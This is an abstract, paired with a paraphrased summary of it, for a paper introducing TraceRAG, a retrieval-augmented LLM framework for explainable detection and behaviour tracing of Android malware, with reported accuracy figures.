To address the challenge of detecting and interpreting stealthy behaviors in Android malware, this paper proposes the first Retrieval-Augmented Generation (RAG) framework tailored for malicious behavior analysis. The framework integrates large language models (LLMs), method-level code summarization, semantic retrieval from a vector database, and multi-turn interactive reasoning to enable natural-language-query-driven code semantic matching and behavioral provenance tracing. Its key contribution lies in pioneering the adaptation of RAG techniques to Android malware analysis, thereby enabling explainable and traceable identification of malicious behaviors. Experimental evaluation—validated via updated VirusTotal scans and manual verification—achieves 96.0% accuracy in malware detection and 83.81% accuracy in behavior identification. Expert assessment further confirms that the generated analytical reports exhibit high readability and practical utility for real-world security analysis.

Sophisticated evasion tactics in malicious Android applications, combined with their intricate behavioral semantics, enable attackers to conceal malicious logic within legitimate functions, underscoring the critical need for robust and in-depth analysis frameworks. However, traditional analysis techniques often fail to recover deeply hidden behaviors or provide human-readable justifications for their decisions. Inspired by advances in large language models (LLMs), we introduce TraceRAG, a retrieval-augmented generation (RAG) framework that bridges natural language queries and Java code to deliver explainable malware detection and analysis. First, TraceRAG generates summaries of method-level code snippets, which are indexed in a vector database. At query time, behavior-focused questions retrieve the most semantically relevant snippets for deeper inspection. Finally, based on the multi-turn analysis results, TraceRAG produces human-readable reports that present the identified malicious behaviors and their corresponding code implementations. Experimental results demonstrate that our method achieves 96% malware detection accuracy and 83.81% behavior identification accuracy based on updated VirusTotal (VT) scans and manual verification. Furthermore, expert evaluation confirms the practical utility of the reports generated by TraceRAG.